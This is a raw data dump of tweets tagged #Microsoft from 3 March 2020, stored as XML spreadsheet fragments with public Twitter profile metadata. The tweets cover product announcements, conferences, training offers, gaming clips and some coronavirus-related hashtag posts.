    <t>{'id': 1234579732009758722, 'id_str': '1234579732009758722', 'name': 'Jillian Elliott', 'screen_name': 'naipotolim', 'location': 'Des Moines, USA', 'description': 'If I had a flower for every time thought of youâ€¦ I could walk through my garden forever', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Mon Mar 02 20:42:08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'http://pbs.twimg.com/profile_images/1234584080458670084/U67QBKJ4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234584080458670084/U67QBKJ4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234579732009758722/1583182789',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</si>
  <si>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15:45:57 +0000 2020</t>
  </si>
  <si>
    <t>Enhanced Meeting Scheduling in Microsoft Teams https://t.co/demIPdMkKH #OneMinuteOfficeMagic #Office365 #Microsoft #MicrosoftTeams #Meetings</t>
  </si>
  <si>
    <t>{'id': 14095886, 'id_str': '14095886', 'name': 'Thomas Duff', 'screen_name': 'duffbert', 'location': '45.538122,-122.62206', 'description': 'Short aging geek, SharePoint, Notes/Domino, speaker, Co-author of two Sametime books', 'url': 'http://t.co/oU5kLHjr2p', 'entities': {'url': {'urls': [{'url': 'http://t.co/oU5kLHjr2p', 'expanded_url': 'http://www.duffbert.com', 'display_url': 'duffbert.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1937, 'friends_count': 440, 'listed_count': 151, 'created_at': 'Fri Mar 07 17:05:39 +0000 2008', 'favourites_count': 670, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 60306,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'http://pbs.twimg.com/profile_images/757606477276131329/6xiNmuki_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/757606477276131329/6xiNmuki_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14095886/1492654566',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</si>
  <si>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15:43:07 +0000 2020</t>
  </si>
  <si>
    <t>Open for (Not at) #Microsoft
 https://t.co/4dOYN9vjNW   #linuxfoundation #entryism #trojanhorse #zemlinPAC</t>
  </si>
  <si>
    <t>Tue Mar 03 15:42:51 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "SETI@home Search for Alien Life Project Shuts Down After 21 Years:" https://t.co/xWEJTSiGLb
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Tue Mar 03 15:42:38 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft ~ Wow...this update is still going on....40 minutes and counting! I had to call my customer and apologize that my computer is updating and I cant get him the info he requested. Any idea when I will get my computer back?...#microsoft #badpolicies #AngerYourCusomers</t>
  </si>
  <si>
    <t>{'id': 463425048, 'id_str': '463425048', 'name': 'Cal', 'screen_name': 'SoCalTheist', 'location': '', 'description': 'â€œLife is real! Life is earnest! And the grave is not its goal.â€ ~ Henry Wadsworth Longfellow', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1562, 'friends_count': 1435, 'listed_count': 98, 'created_at': 'Sat Jan 14 02:58:33 +0000 2012', 'favourites_count': 15780, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9808,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'http://pbs.twimg.com/profile_images/1195466048448819201/Bp9zbpNG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195466048448819201/Bp9zbpNG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/463425048/1573856144',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</si>
  <si>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Tue Mar 03 15:41:02 +0000 2020</t>
  </si>
  <si>
    <t>INFORMATION SECURITY CERTIFICATION (ISC)2 CISSP $5,995 
Price includes: Airfare, Lodging, Transportation, Books, Test Vouchers. Register here https://t.co/UXLBjBVKvy
#Informationsecurity #CISSP #IT #ITCareer #Microsoft https://t.co/2S0XgmbEgi</t>
  </si>
  <si>
    <t>{'id': 283337753, 'id_str': '283337753', 'name': 'Certification Camps', 'screen_name': 'CertCamps', 'location': 'Sarasota, Florida', 'description': 'The leading provider in accelerated training for Microsoft Certification.   A Gold Certified Partner.', 'url': 'http://t.co/KXEhApmOry', 'entities': {'url': {'urls': [{'url': 'http://t.co/KXEhApmOry', 'expanded_url': 'http://www.certificationcamps.com/', 'display_url': 'certificationcamps.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3430, 'friends_count': 1845, 'listed_count': 82, 'created_at': 'Sun Apr 17 03:03:12 +0000 2011', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1322,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'http://pbs.twimg.com/profile_images/378800000703430798/c01fa91ff2e9867f5470c9dc2c854b8d_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000703430798/c01fa91ff2e9867f5470c9dc2c854b8d_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/283337753/1418830080',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</si>
  <si>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15:40:38 +0000 2020</t>
  </si>
  <si>
    <t>Ok time to make the donuts! Or in my case,  time to tell my favorite story, about #Microsoft, #DevOps, and #GrowthMindset. Come join me in the silver ballroom at @VSLive yes I know its early but it will be worth it.</t>
  </si>
  <si>
    <t>{'id': 14987316, 'id_str': '14987316', 'name': 'Mickey Gousset @ VSLive Las Vegas', 'screen_name': 'mickey_gousset', 'location': 'Tupelo, MS', 'description': 'DevOps Architect with Microsoft | Youtube: https://t.co/LmLje2SDJr | Audio Books @mickeyacx', 'url': 'https://t.co/YpyQuyphkL', 'entities': {'url': {'urls': [{'url': 'https://t.co/YpyQuyphkL', 'expanded_url': 'http://www.mickeygousset.com', 'display_url': 'mickeygousset.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/LmLje2SDJr', 'expanded_url': 'http://youtube.com/mickeygousset', 'display_url': 'youtube.com/mickeygousset', 'indices': [43, 66]}]}}, 'protected': False, 'followers_count': 1362, 'friends_count': 132, 'listed_count': 126, 'created_at': 'Tue Jun 03 00:52:34 +0000 2008', 'favourites_count': 1754, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8375,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'http://pbs.twimg.com/profile_images/978391773444694017/KQWayCKS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/978391773444694017/KQWayCKS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14987316/1455930377',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</si>
  <si>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15:39:05 +0000 2020</t>
  </si>
  <si>
    <t>This was play of the game.
Remember to follow @drhemotoxin for more clips
#games #Cod #modernwarfare #xb1 #Codclips #rainbowsixsiege #r6 #apex #gaming #Gamer #callofduty #Callofdutymodernwarfare #Rainbow #Siege #Microsoft #XboxOne #Xbox #Console https://t.co/sxRjWUZx72</t>
  </si>
  <si>
    <t>Tue Mar 03 15:37:03 +0000 2020</t>
  </si>
  <si>
    <t>Yup another gameplay video of yakuza 0, commentated 
#xbox #gamer #snes #ControllerGang
#pcgaming #newcontent #Watch
#Microsoft #sega
https://t.co/Bl7Xj7M3c8</t>
  </si>
  <si>
    <t>{'id': 586440077, 'id_str': '586440077', 'name': 'Cartridge Knight', 'screen_name': 'micromi23', 'location': '', 'description': 'yo you sexy peoples check out my YouTube channel where I do gaming videos with sarcastic over the commentary', 'url': 'https://t.co/LKmUtPh2yi', 'entities': {'url': {'urls': [{'url': 'https://t.co/LKmUtPh2yi', 'expanded_url': 'https://www.youtube.com/user/micromi23', 'display_url': 'youtube.com/user/micromi23', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 84, 'friends_count': 153, 'listed_count': 5, 'created_at': 'Mon May 21 10:40:42 +0000 2012', 'favourites_count': 2668, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1194,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'http://pbs.twimg.com/profile_images/1126187378006269952/4dSNf10s_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126187378006269952/4dSNf10s_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/586440077/1583257093',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</si>
  <si>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15:37:02 +0000 2020</t>
  </si>
  <si>
    <t>Powerful, secure productivity tools not just for workers behind a desk https://t.co/9QqzFTxStJ #Microsoft https://t.co/xE1Ah5vxEF</t>
  </si>
  <si>
    <t>Tue Mar 03 15:36:59 +0000 2020</t>
  </si>
  <si>
    <t>The personal review of our colleague, about last weekend 
@dotnetdaysro- .NET &amp;amp; architecture Conference in Iasi, #Romania: A great conference, driven by great people, led to a wonderful experience.  https://t.co/ijmwDhM64R #dotnet #Microsoft https://t.co/Ekw7PDtgfj</t>
  </si>
  <si>
    <t>{'id': 1110155205553852416, 'id_str': '1110155205553852416', 'name': 'Indrivo', 'screen_name': 'IndrivoIT', 'location': 'Worldwide', 'description': '#Technology Solutions for the #Digital Evolution. #InformationTechnology and Agile Transformation Services.', 'url': 'https://t.co/vwu0ysgzrk', 'entities': {'url': {'urls': [{'url': 'https://t.co/vwu0ysgzrk', 'expanded_url': 'http://www.indrivo.com', 'display_url': 'indrivo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 55, 'listed_count': 0, 'created_at': 'Mon Mar 25 12:23:21 +0000 2019', 'favourites_count': 16, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1121745116740370437/nve_2jS6_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121745116740370437/nve_2jS6_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1110155205553852416/1563204746',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</si>
  <si>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15:36:53 +0000 2020</t>
  </si>
  <si>
    <t>@XHNews China's endangered wildlife populations have risen steadily over recent years....until #Wuhan
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping https://t.co/076fxBRsyX</t>
  </si>
  <si>
    <t>Tue Mar 03 15:36:30 +0000 2020</t>
  </si>
  <si>
    <t>@inc_group_uk Cloud &amp;amp; Apps BU director @IainC_IG taking us on journey of modernising legacy apps with #Microsoft #powerplatform.
#powerautomate, RPA &amp;amp; UI flows are really getting people excited and talking today. Wonderful engagement from the #Aberdeen #DynamicsForum audience  https://t.co/mdFTrvyqVb</t>
  </si>
  <si>
    <t>Tue Mar 03 15:35:24 +0000 2020</t>
  </si>
  <si>
    <t>Ready to take your #nonprofit #organization to the next level?#appliedcloudsystems and #Microsoft present #windowsvirtualdesktop Webinar,offering insights into how this #technology is used in #nonprofit https://t.co/Kij5ctYdcU below to register today! https://t.co/WZQlOKLh1y https://t.co/yMlOl0vPSW</t>
  </si>
  <si>
    <t>{'id': 760842197100994561, 'id_str': '760842197100994561', 'name': 'AppliedCloudSystems', 'screen_name': 'AppliedCloudSys', 'location': 'Pennsylvania, USA', 'description': 'Microsoft Cloud Specialists - Azure, Office365, CRM, PowerBI', 'url': 'https://t.co/7jC5Vfc6BQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/7jC5Vfc6BQ', 'expanded_url': 'http://www.appliedcloudsystems.com', 'display_url': 'appliedcloudsystems.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 40, 'friends_count': 45, 'listed_count': 0, 'created_at': 'Wed Aug 03 14:18:10 +0000 2016', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1167155803205361668/tZSxqbnC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1167155803205361668/tZSxqbnC_normal.jpg',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</si>
  <si>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15:33:20 +0000 2020</t>
  </si>
  <si>
    <t>Organizers hope to reschedule the event later in the summer.
#WarpInn #geek #gamedevelopersconference #gdc2020 #gdc #gamedev #gamedeveloper #epic #sony #microsoft #amazon #unitygames #facebook #coronavirus #videogames #gamingworld #gamingcommunity #gamingpost #gamingnews #gaming https://t.co/OTzZufkZ59</t>
  </si>
  <si>
    <t>{'id': 1207532604574097411, 'id_str': '1207532604574097411', 'name': 'Warp Inn', 'screen_name': 'warp_inn', 'location': '', 'description': 'Warp Inn is a curated shopping site for those interested in gaming, comics, and more. As an Amazon Associate, Warp Inn earns from qualifying purchases. #WarpInn', 'url': 'https://t.co/BoSObTD8m7', 'entities': {'url': {'urls': [{'url': 'https://t.co/BoSObTD8m7', 'expanded_url': 'http://www.warpinn.com', 'display_url': 'warpinn.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 34, 'listed_count': 0, 'created_at': 'Thu Dec 19 05:26:30 +0000 2019', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 98, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1222663534900916225/oBdqZg2E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222663534900916225/oBdqZg2E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1207532604574097411/1580087790',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</si>
  <si>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15:33:11 +0000 2020</t>
  </si>
  <si>
    <t>Silicon Valley, are you listening?
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #TikTok #Google #Twitter #Cisco #Intel #HP #GM #Ford #SiliconValley 
https://t.co/Weiyf7hP80</t>
  </si>
  <si>
    <t>Tue Mar 03 15:32:08 +0000 2020</t>
  </si>
  <si>
    <t>Stack Overflow expands its Teams service with new integrations https://t.co/fVWL0TpLOq #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 15:30:21 +0000 2020</t>
  </si>
  <si>
    <t>Know how Local Internet breakout can help you simplify Office 365 routing and how you can improve per user internet bandwidth using ScaleAon SD-WANs Dynamic Path Selection.
https://t.co/wDD4nCmEcb
#Microsoft #Office365 #Network #SDWAN</t>
  </si>
  <si>
    <t>{'id': 744812384443760641, 'id_str': '744812384443760641', 'name': 'Lavelle Networks', 'screen_name': 'lavellenetworks', 'location': 'Bengaluru, India', 'description': 'Lavelle Networks provides #SDWAN #Enterprise solutions to build #cloud ready networks.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6204, 'friends_count': 5962, 'listed_count': 68, 'created_at': 'Mon Jun 20 08:41:25 +0000 2016', 'favourites_count': 933, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9354,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'http://pbs.twimg.com/profile_images/1113338535547887616/DlEycmRD_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113338535547887616/DlEycmRD_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/744812384443760641/1579160649',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</si>
  <si>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15:30:12 +0000 2020</t>
  </si>
  <si>
    <t>How to technically consolidate multiple WindowsR 2008 file servers onto a WindowsR 2019 file server &amp;amp; save money. This video explains how to resolve naming conflicts of folders, shares &amp;amp; local group names. https://t.co/UjaqYyTvaf #FileServer #storage #Microsoft #WinServ #WinSrv</t>
  </si>
  <si>
    <t>Tue Mar 03 15:30:03 +0000 2020</t>
  </si>
  <si>
    <t>Get  discount on #MicrosoftSurfaceGo 8GB / 128GB  only from Braintone store
also special discounts for students and EMI offer.
our store - https://t.co/XIbh26shyh
contact us-
8080890908
paresh@braintoneindia.com
#braintonetechnology #microsoft  #windows #laptops #intel https://t.co/YTXbxkTVWl</t>
  </si>
  <si>
    <t>{'id': 1230061671504171008, 'id_str': '1230061671504171008', 'name': 'braintonetechnology', 'screen_name': 'braintoneindia', 'location': 'vile parle-mumbai', 'description': 'braintone technology is a multi branded authorized laptops store', 'url': 'https://t.co/z15Byxt512', 'entities': {'url': {'urls': [{'url': 'https://t.co/z15Byxt512', 'expanded_url': 'https://www.braintoneindia.com', 'display_url': 'braintoneindia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Wed Feb 19 09:29:37 +0000 2020', 'favourites_count': 5,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'http://pbs.twimg.com/profile_images/1230078793336836096/RFRYO59B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230078793336836096/RFRYO59B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1230061671504171008/1582110768',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</si>
  <si>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15:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Testing and Monitoring Machine Learning Model Deployments #udemycoupon -&amp;gt; https://t.co/hRpY5zuxxj
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Tue Mar 03 15:29:06 +0000 2020</t>
  </si>
  <si>
    <t>Reduce your Inbox! We've added a new offer to @McrDig - FREE Microsoft Teams Taster Sessions! Don't miss out - book yours today! Find out more here: https://t.co/2IDqGXOAfs #MicrosoftTeams #Microsoft #Teams #Collaboration #Communication #ReduceEmail</t>
  </si>
  <si>
    <t>{'id': 2558582215, 'id_str': '2558582215', 'name': 'inTec Business Solutions', 'screen_name': 'InTecBusinessSo', 'location': 'Altrincham', 'description': 'WORK SMARTER, NOT HARDER | Improve your business through technology with inTec! Check out our latest events at https://t.co/GZlUcBd4Kh', 'url': 'https://t.co/M3nJ2aKo8M', 'entities': {'url': {'urls': [{'url': 'https://t.co/M3nJ2aKo8M', 'expanded_url': 'http://www.intecbusiness.co.uk', 'display_url': 'intecbusiness.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/GZlUcBd4Kh', 'expanded_url': 'http://www.intecbusiness.co.uk/events', 'display_url': 'intecbusiness.co.uk/events', 'indices': [111, 134]}]}}, 'protected': False, 'followers_count': 801, 'friends_count': 1131, 'listed_count': 13, 'created_at': 'Tue Jun 10 08:53:25 +0000 2014', 'favourites_count': 1102, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1363,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'http://pbs.twimg.com/profile_images/1014906812095754246/KtJe42mY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1014906812095754246/KtJe42mY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2558582215/1580905944', 'profile_link_color': 'FF691F',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</si>
  <si>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Tue Mar 03 15:28:20 +0000 2020</t>
  </si>
  <si>
    <t>We analysed data from 995 of the worlds largest companies. Our finding was common: #Data and #analytics is a priority for leadership. Read here to see how you can put data front and center with our @SAP solutions: https://t.co/HVCVnnfenj #SAPWeek2020 #SAP #PowerOf3 #Microsoft https://t.co/YeoAZutIzf</t>
  </si>
  <si>
    <t>Tue Mar 03 15:23:31 +0000 2020</t>
  </si>
  <si>
    <t>@XHNews #BREAKING:  China is still cremating people at the rate of 1,400 per day amid #COVID19 
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping https://t.co/Es6BWCdxI0</t>
  </si>
  <si>
    <t>Tue Mar 03 15:22:17 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020
https://t.co/4kTr3YZw0O
#Microsoft #Azure #Cloud #CostManagement #Billing</t>
  </si>
  <si>
    <t>Tue Mar 03 15:22:03 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 15:19:57 +0000 2020</t>
  </si>
  <si>
    <t>In case you missed it, here's our 6 key Microsoft announcements from this year's RSA Conference. Read more below:
https://t.co/5ekKdFtZcJ
#Security #Microsoft #RSAC #Cloud</t>
  </si>
  <si>
    <t>{'id': 170368614, 'id_str': '170368614', 'name': 'Cisilion', 'screen_name': 'Cisilion', 'location': 'London, England', 'description': 'Global, consultative led Systems Integrator. Experts in design, delivery, support and managed services in UC, Security, Networking, DataCentre &amp; Mobility.', 'url': 'http://t.co/09IWO5sswg', 'entities': {'url': {'urls': [{'url': 'http://t.co/09IWO5sswg', 'expanded_url': 'http://www.cisilion.com', 'display_url': 'cisilion.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1548, 'friends_count': 998, 'listed_count': 155, 'created_at': 'Sat Jul 24 17:00:34 +0000 2010', 'favourites_count': 3421, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7552,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'http://pbs.twimg.com/profile_images/1214128479115104256/pgCIm-kT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214128479115104256/pgCIm-kT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/170368614/1461576596',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</si>
  <si>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15:18:02 +0000 2020</t>
  </si>
  <si>
    <t>Last session of the day @AzureDayPL, really nice to see Mohammed Wali talking about the ins and outs of Azure Arc #AzureDayPL #microsoft #azure #arc https://t.co/KqtIuFrFiI</t>
  </si>
  <si>
    <t>{'id': 220103641, 'id_str': '220103641', 'name': 'ð™´ð™³.ð™½ð™´ðšƒ', 'screen_name': 'ed_dotnet', 'location': 'South Holland, The Netherlands', 'description': 'Software Developer, Microsoft, Azure, .NET, 4DotNet, International Speaker', 'url': 'https://t.co/ErDGcAZhWw', 'entities': {'url': {'urls': [{'url': 'https://t.co/ErDGcAZhWw', 'expanded_url': 'https://hexmaster.nl', 'display_url': 'hexmaster.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 122, 'friends_count': 96, 'listed_count': 9, 'created_at': 'Fri Nov 26 20:02:18 +0000 2010', 'favourites_count': 379, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 707,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'http://pbs.twimg.com/profile_images/1179486682715963394/fQN4JwL0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179486682715963394/fQN4JwL0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/220103641/1571901508', 'profile_link_color': '000000', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'CCCCCC', 'profile_text_color': '888888', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 15:16:19 +0000 2020</t>
  </si>
  <si>
    <t>Learn how you can benefit from using #Microsoft and #Cisco tools at work and improve productivity each and every day. #MicrosoftTeams #CiscoWebex #Webex #HIMSS20 #UC https://t.co/Pdxqi6fPC8 https://t.co/SQWIO1cUGb</t>
  </si>
  <si>
    <t>{'id': 43563379, 'id_str': '43563379', 'name': 'Kevin Barnett', 'screen_name': 'kwbarnett', 'location': 'California', 'description': "Technical Director -Carousel Industries\nLead a team of UC Solution Architects &amp; SE's, focused on providing innovative biz solutions, cloud &amp; managed services", 'url': 'https://t.co/YgZm0E1hyZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/YgZm0E1hyZ', 'expanded_url': 'https://www.linkedin.com/in/kwbarnett', 'display_url': 'linkedin.com/in/kwbarnett', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 363, 'friends_count': 498, 'listed_count': 227, 'created_at': 'Sat May 30 17:46:58 +0000 2009', 'favourites_count': 373, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8498,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'http://pbs.twimg.com/profile_images/423616702111170560/Nv2pQpec_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/423616702111170560/Nv2pQpec_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/43563379/1571620764',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</si>
  <si>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15:15:07 +0000 2020</t>
  </si>
  <si>
    <t>Coming soon: #Microsoft Certified - #Azure #Database Administrator Associate... https://t.co/m0DXMTnG0w https://t.co/gMrWqxjCfp</t>
  </si>
  <si>
    <t>{'id': 146915361, 'id_str': '146915361', 'name': 'Guy Glantser', 'screen_name': 'guy_glantser', 'location': 'Israel', 'description': "I'm the founder and CEO of Madeira, a company that provides data solutions. I am a Data Platform MVP and the leader of the Israeli Data Platform Meetup.", 'url': 'http://t.co/FrTbxTkU1Q', 'entities': {'url': {'urls': [{'url': 'http://t.co/FrTbxTkU1Q', 'expanded_url': 'http://www.madeiradata.com', 'display_url': 'madeiradata.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 710, 'friends_count': 394, 'listed_count': 36, 'created_at': 'Sat May 22 17:44:26 +0000 2010', 'favourites_count': 579, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 953,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'http://pbs.twimg.com/profile_images/1437279880/Guy_-_Small_Picture_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1437279880/Guy_-_Small_Picture_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/146915361/1484543351',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</si>
  <si>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15:11:27 +0000 2020</t>
  </si>
  <si>
    <t>See the Progress and Current Status of the Record with Business Process Flow.
https://t.co/3gqyLtbZSt
#business #businessprocess #progress #crmdynamics #powerautomate #process #microsoft #microsoftdynamicscrm #crm #dynamics365 #technology #erp #customerrelationshipmanagement</t>
  </si>
  <si>
    <t>Tue Mar 03 15:10:26 +0000 2020</t>
  </si>
  <si>
    <t>Are you studying for your #MCSA, #MCSD or #MCSE? Have you heard? #Microsoft is making some big changes in the 
#Certification space. Check out this video to see how it affects you? https://t.co/0HXgxSoBlE 
#RoleBased #DigitalTransformation</t>
  </si>
  <si>
    <t>{'id': 781137635335106560, 'id_str': '781137635335106560', 'name': 'Cherokee_ITProTV', 'screen_name': 'CherokeeITProTV', 'location': 'Gainesville, FL', 'description': '#Edutainer and #ShowHost @ITProTV #NativeFlordian #DotingMother #ComputerScienceEnthusiast #SelfProclaimedCupcakeConnoiseur', 'url': 'https://t.co/gybD9Q2Ofv', 'entities': {'url': {'urls': [{'url': 'https://t.co/gybD9Q2Ofv', 'expanded_url': 'https://itpro.tv', 'display_url': 'itpro.tv', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 873, 'friends_count': 1224, 'listed_count': 24, 'created_at': 'Wed Sep 28 14:24:59 +0000 2016', 'favourites_count': 1363, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1254,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'http://pbs.twimg.com/profile_images/1234319337848233984/y0TCqsjT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234319337848233984/y0TCqsjT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/781137635335106560/1539307802',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</si>
  <si>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15:10:08 +0000 2020</t>
  </si>
  <si>
    <t>5 steps for boosting your digital transformation with #Microsoft 365
https://t.co/rUJip1sPf2 @Microsoft365</t>
  </si>
  <si>
    <t>Tue Mar 03 15:10:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft (MSFT) Stock Rose 6.65% on Monday, No Coronavirus Worries
https://t.co/uJW9o2SFLW
#Microsoft #MSFT https://t.co/ecA7iINYxm</t>
  </si>
  <si>
    <t>{'id': 2379303330, 'id_str': '2379303330', 'name': 'Coinspeaker', 'screen_name': 'coinspeaker', 'location': 'Malta', 'description': 'The latest news in Finance: from Bitcoin and blockhain to Fintech and Stock Markets', 'url': 'http://t.co/HCk7KJWhJi', 'entities': {'url': {'urls': [{'url': 'http://t.co/HCk7KJWhJi', 'expanded_url': 'http://www.coinspeaker.com', 'display_url': 'coinspeaker.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4274, 'friends_count': 244, 'listed_count': 194, 'created_at': 'Sat Mar 08 21:00:35 +0000 2014', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10585, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CA0002', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/445213930005082112/SF3enDzD_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/445213930005082112/SF3enDzD_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2379303330/1565990030', 'profile_link_color': 'CA0002',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</si>
  <si>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15:09:55 +0000 2020</t>
  </si>
  <si>
    <t>@A2A11y is happy 2 announce our free MeetUp of #Entrepreneurs &amp;amp; #Professionals, w #Disabilities is 300 members &amp;amp; growing! Join us as we share resources; network &amp;amp; support one another; + learn #accessibility in business ie #Microsoft Presentation Translator https://t.co/N6rocibZZ1</t>
  </si>
  <si>
    <t>Tue Mar 03 15:08:07 +0000 2020</t>
  </si>
  <si>
    <t>Life without the internet is pretty hard to fathom since we use it for virtually everything in our lives. 
Here are 10 things you take for granted when you have internet access  https://t.co/Ex68plY9Ai 
#sonar #microsoft #airbandinitiative #bettertogether @Microsoft https://t.co/HSMe2OE19j</t>
  </si>
  <si>
    <t>Tue Mar 03 15:05:17 +0000 2020</t>
  </si>
  <si>
